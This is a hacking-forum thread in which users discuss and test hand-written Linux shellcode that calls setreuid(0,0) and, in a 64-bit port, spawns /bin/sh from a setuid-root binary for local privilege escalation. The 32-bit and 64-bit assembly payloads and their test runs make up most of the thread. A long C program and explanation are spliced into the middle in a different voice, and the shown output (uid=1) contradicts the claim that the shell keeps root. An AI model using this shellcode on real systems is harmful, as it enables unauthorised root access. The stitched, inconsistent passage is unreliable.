EvilZone > Hacking and Security
Posted by Short-Circuit, January 08, 2013, 09:21:13 PM
-
So say I used this assembly (Linux 32-bit, NASM) as an exploit payload for a local BoF vulnerability:
SEGMENT .text
global _start
_start:
    ; setreuid(0, 0): i386 syscall 70, ruid in ebx, euid in ecx
    xor eax, eax        ; clear eax first: mov al only sets the low byte
    mov al, 70
    xor ebx, ebx
    xor ecx, ecx
    int 80h
    ; exit(1): clear eax again, setreuid leaves -1 in eax when it fails
    xor eax, eax
    mov al, 1
    inc ebx
    int 80h
Would it give me root? I hand-coded this and I used the syscall for changing uid, but I'm curious if the uid would stay as 0 when the program exited?
Any ideas? ;)
-
Maybe I'm missing something, but you're saying it's a local vuln, why don't you test it?
What you're trying to do is call the setreuid syscall. Take a look at the following excerpt from its man page:
A process with appropriate privileges can set either ID to any value. An unprivileged process can only set the effective user ID if the euid argument is equal to either the real, effective, or saved user ID of the process.
I might be wrong, but this makes me believe that it won't give you what you'd like.
-
I think this will only work if the program you are trying to exploit is owned by root and can be executable by non-root users.
-
I think this will only work if the program you are trying to exploit is owned by root and can be executable by non-root users.
And has +s and is not being ptraced.
You cannot simply change your UID to get root.
Did you try to execute it?
[ca0s@st4ck-3rr0r Tests]$ strace -e setreuid ./setreuid
[ Process PID=1206 runs in 32 bit mode. ]
setreuid(0, 0) = -1 EPERM (Operation not permitted)
syscall_4294967041(0x1, 0, 0x80483d0, 0, 0, 0) = -1 (errno 38)
+++ exited with 0 +++
Then I ported it to 64 bits (my machine is 64-bit and I wanted to execve a 64-bit executable from the shellcode...)
SEGMENT .text
global main
main:
    ; setreuid(0, 0): x86_64 syscall 113, arguments go in rdi and rsi (not ebx/ecx)
    mov eax, 113
    xor edi, edi
    xor esi, esi
    syscall
    jmp str
doeet:
    ; execve("/bin/sh", NULL, NULL): the call below pushed the string address, pop it into rdi
    pop rdi
    xor esi, esi
    xor edx, edx
    mov eax, 59
    syscall
    ; only reached if execve fails: exit(1) is syscall 60 on x86_64 (1 is write)
    mov eax, 60
    mov edi, 1
    syscall
str:
    call doeet
    db '/bin/sh', 0
At first:
[ca0s@st4ck-3rr0r Tests]$ ls -la setreuid
-rwxr-xr-x 1 ca0s users 6601 Jan 9 14:10 setreuid
[ca0s@st4ck-3rr0r Tests]$ ./setreuid
[ca0s@st4ck-3rr0r Tests]$ id
uid=1000(ca0s) gid=100(users) groups=100(users),7(lp),92(audio),93(optical),95(storage),98(power),108(vboxusers),1002(bluetooth)
Then:
[root@st4ck-3rr0r Tests]# chown root:root setreuid
[root@st4ck-3rr0r Tests]# chmod +s setreuid
[root@st4ck-3rr0r Tests]# ls -la setreuid
-rwsr-sr-x 1 root root 6601 Jan 9 14:10 setreuid
So:
[ca0s@st4ck-3rr0r Tests]$ id
uid=1000(ca0s) gid=100(users) groups=100(users),7(lp),92(audio),93(optical),95(storage),98(power),108(vboxusers),1002(bluetooth)
[ca0s@st4ck-3rr0r Tests]$ ./setreuid
setreuid-4.2$ id
uid=1(bin) gid=100(users) groups=1(bin),7(lp),92(audio),93(optical),95(storage),98(power),100(users),108(vboxusers),1002(bluetooth)
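The man page excerpt quoted earlier and the setuid test above both come down to one kernel rule: setreuid() may move the real and effective uid anywhere only when the caller is already privileged, and an unprivileged caller can only pick values it already holds (real, effective, or saved). The following C program is an added example, not code from the thread: model_setreuid() is a small model of that rule as documented in setreuid(2) (it assumes "privileged" means effective uid 0, which is what a setuid-root binary hands the process; the struct name, function names and the constructed uid values are my own), and try_setreuid() runs the real syscall so you can compare the model against your own machine.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Constructed credential set: real, effective and saved user id of a process. */
struct creds {
    uid_t ruid, euid, suid;
};

/* Model of the setreuid(2) permission rule (assumption: privileged == euid 0,
 * i.e. the process holds CAP_SETUID). Returns 0 on success or the errno the
 * kernel would return, and updates *c the way the kernel would. */
int model_setreuid(struct creds *c, uid_t r, uid_t e)
{
    const uid_t KEEP = (uid_t)-1;   /* -1 means "leave this id unchanged" */
    int privileged = (c->euid == 0);
    uid_t old_r = c->ruid;

    if (!privileged) {
        /* real uid may only become the current real or effective uid */
        if (r != KEEP && r != c->ruid && r != c->euid)
            return EPERM;
        /* effective uid may only become the current real, effective or saved uid */
        if (e != KEEP && e != c->ruid && e != c->euid && e != c->suid)
            return EPERM;
    }
    if (r != KEEP)
        c->ruid = r;
    if (e != KEEP)
        c->euid = e;
    /* saved uid follows the new euid when the real uid is set, or when the
     * effective uid is set to something other than the previous real uid */
    if (r != KEEP || (e != KEEP && e != old_r))
        c->suid = c->euid;
    return 0;
}

/* Run the real syscall; return 0 on success or errno on failure. */
int try_setreuid(uid_t r, uid_t e)
{
    return setreuid(r, e) == 0 ? 0 : errno;
}

int main(void)
{
    uid_t r, e, s;
    getresuid(&r, &e, &s);
    printf("before: ruid=%u euid=%u suid=%u\n", r, e, s);
    int err = try_setreuid(0, 0);
    printf("setreuid(0, 0) -> %s\n", err ? strerror(err) : "ok");
    getresuid(&r, &e, &s);
    printf("after:  ruid=%u euid=%u suid=%u\n", r, e, s);
    return 0;
}
```

Run as a normal user the real call fails with EPERM, exactly as in the strace output above; from a setuid-root binary the effective uid is already 0, so the model (and the kernel) lets setreuid(0, 0) make the real uid 0 as well, which is why the spawned shell keeps its privilege. The model also shows the defensive side of the same rule: a setuid program that only does setreuid(-1, getuid()) leaves the saved uid at 0, so the lower privilege can be regained with setreuid(-1, 0).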
-
Thanks for testing it, I didn't expect it to work as it is usually combined with opening a shell session.
Thanks though. And happy shellcoding :3